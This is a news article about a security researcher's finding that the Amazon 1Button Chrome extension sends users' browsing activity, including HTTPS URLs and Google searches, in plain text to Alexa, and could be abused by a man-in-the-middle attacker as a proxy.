Amazon 1Button, a Google Chrome browser add-on that provides users with access to the Amazon online marketplace, is leaking private information like a sieve, according to a security researcher.
The app reports every URL to visit to Amazon, even encrypted HTTPS sessions, attaches script to any website you visit, and reports your Web activities to Alexa, which is an analytics service that tracks the performance of top websites, said Krzysztof Kotowicz, a researcher specializing in Web security.
The Google Chrome extension is worrisome, Kotowicz said, because it requires the user to approve the app’s ability to access data on all websites, read and modify bookmarks, detect physical location, access browsing activity, manage apps, extensions and themes, and access data that ends up copied and pasted. There are nearly two million users of this app, he said.
“There are a few interesting things going on (all of them require no user interaction and are based on default settings),” Kotowicz said.
The information sent by Amazon 1Button to Alexa not only includes URLs, but Google searches too — even those sent over HTTPS — along with the first few results returned. The URL and page information, Kotowicz discovered, is sent in plain text over HTTP to widgets[.]alexa[.]com.
“So man-in-the-middle attackers can access the information that the extension is configured to send to Alexa,” he said. “The real problem though is that attackers can actively exploit described extension features to hijack your information, e.g. get access to your HTTPS URLs and page contents. [The] extension dynamically configures itself by fetching information from Amazon. Namely, upon installation (and then periodically) it requests and processes two config files.”
The files define which HTTPS sites can undergo inspection and which URL patterns to search for and XPath expressions to extract and send to Alexa, Wotowicz said. These ended up sent out in the clear, but last Friday Amazon changed the files and they now serve out over HTTPS, he said.
On his site, Wotowicz showed how a script can convert the Chrome extension into a transparent HTTPS to HTTP proxy. An attacker would need to route traffic to the proxy and launch the script he wrote. There are limitations, he added, but he was still able to capture traffic, session IDs, email messages, documents and more.